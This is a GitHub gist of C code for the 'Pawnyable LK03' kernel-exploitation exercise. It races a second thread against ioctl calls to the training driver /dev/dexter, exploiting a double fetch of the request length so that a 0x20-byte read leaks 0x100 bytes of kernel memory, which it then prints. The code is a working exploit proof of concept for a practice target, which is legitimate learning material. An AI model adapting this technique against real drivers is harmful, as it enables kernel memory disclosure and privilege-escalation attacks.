Created
December 7, 2022 06:37
-
-
Save brant-ruan/1e22743162fd508a3a74741a28e52e69 to your computer and use it in GitHub Desktop.
Pawnyable LK03
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#define _GNU_SOURCE | |
#include <fcntl.h> | |
#include <pthread.h> | |
#include <sched.h> | |
#include <stdint.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include <sys/ioctl.h> | |
#include <sys/stat.h> | |
#include <sys/types.h> | |
#include <unistd.h> | |
#define CMD_GET 0xdec50001 | |
#define CMD_SET 0xdec50002 | |
void fatal(char *msg) { | |
perror(msg); | |
exit(-1); | |
} | |
typedef struct { | |
char *ptr; | |
size_t len; | |
} request_t; | |
int fd; | |
request_t req; | |
int race_win = 0; | |
int set(char *buf, size_t len) { | |
req.ptr = buf; | |
req.len = len; | |
return ioctl(fd, CMD_SET, &req); | |
} | |
int get(char *buf, size_t len) { | |
req.ptr = buf; | |
req.len = len; | |
return ioctl(fd, CMD_GET, &req); | |
} | |
void *race(void *arg) { | |
puts("[*] trying to set req.len to 0x100"); | |
while (!race_win) { | |
req.len = 0x100; | |
usleep(1); | |
} | |
return NULL; | |
} | |
int main() { | |
fd = open("/dev/dexter", O_RDWR); | |
if (fd == -1) | |
fatal("/dev/dexter"); | |
char buf[0x100] = {0}; | |
char zero[0x100] = {0}; | |
pthread_t th; | |
pthread_create(&th, NULL, race, NULL); | |
puts("[*] trying to read 0x20 from /dev/dexter"); | |
while (!race_win) { | |
get(buf, 0x20); | |
if (memcmp(buf, zero, 0x100) != 0) { | |
puts("[+] reached race condition"); | |
race_win = 1; | |
break; | |
} | |
} | |
pthread_join(th, NULL); | |
puts("[+] more than 0x20 data is leaked:"); | |
for (int i = 0; i < 0x100; i += 8) | |
printf("%02x: 0x%016lx\n", i, *(unsigned long *)&buf[i]); | |
close(fd); | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment